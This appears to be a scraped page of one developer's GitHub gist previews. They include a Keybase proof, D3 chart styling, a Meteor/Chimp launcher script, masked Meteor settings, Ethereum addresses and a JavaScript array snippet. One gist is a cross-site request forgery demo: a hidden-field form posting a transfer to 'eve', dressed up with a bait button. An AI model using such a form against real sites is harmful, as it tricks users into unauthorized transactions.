I hereby claim:
- I am schmidsi on github.
- I am schmidsi (https://keybase.io/schmidsi) on keybase.
- I have a public key ASC9luUDHfp9tpeNfzFN2cQ0Kv1DS0C8GQ0fIyRXLhuUYwo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
<!DOCTYPE html> | |
<meta charset="utf-8"> | |
<style> | |
body { | |
margin: 15px; | |
background-color: #F1F3F3 | |
} | |
.bar.skill { | |
fill: #6F257F; | |
} |
license: gpl-3.0 |
// Inspired from: https://github.com/xolvio/qualityfaster/blob/master/.scripts/ | |
import { exec } from 'child_process'; | |
const meteorCommand = process.argv[2]; | |
const chimpCommand = process.argv[3]; | |
const meteorProcess = exec(meteorCommand); // 'npm start' | |
meteorProcess.stdout.pipe(process.stdout); | |
meteorProcess.stderr.pipe(process.stderr); |
<form action="https://krysi-csrf-express.now.sh/transfer" method="POST"> | |
<input type="hidden" name="payee" value="eve" /> | |
<input type="hidden" name="amount" value="1234051234" /> | |
<button type="submit">If you're sexy and you know it, click me ;)</button> | |
</form> |
0x546457bbDdf5e09929399768AB5a9D588Cb0334d |
0x6D32657f13e771472BdDCD31DE968de84397b7C6 |
Meteor.settings = { | |
PrerenderIO: { | |
token: '*', | |
prerenderServiceUrl: 'https://service.prerender.io' | |
}, | |
'galaxy.meteor.com': { | |
env: { | |
MONGO_URL: 'mongodb://*', | |
ROOT_URL: 'https://staging.melonport.com' | |
} |
Array(5).fill().map((item, index) => index); | |
// [ 0, 1, 2, 3, 4 ] |